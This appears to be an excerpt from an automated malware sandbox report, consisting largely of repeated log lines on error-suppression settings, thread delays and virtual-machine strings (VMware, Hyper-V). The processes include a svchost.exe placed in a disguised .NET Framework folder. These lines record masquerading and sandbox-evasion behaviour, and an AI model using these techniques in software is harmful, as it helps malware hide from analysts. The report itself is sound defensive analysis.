        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4778Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1763Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4493Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2472Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 1502
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 8058
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: foregroundWindowGot 589
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep time: -16602069666338586s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -13835058055282155s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6448Thread sleep time: -15679732462653109s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: powershell.exe, 00000001.00000003.824518688.0000000005872000.00000004.00000001.sdmpBinary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: powershell.exe, 00000001.00000003.824518688.0000000005872000.00000004.00000001.sdmpBinary or memory string: Hyper-V
        Source: explorer.exe, 00000012.00000002.917668175.00000000008C6000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
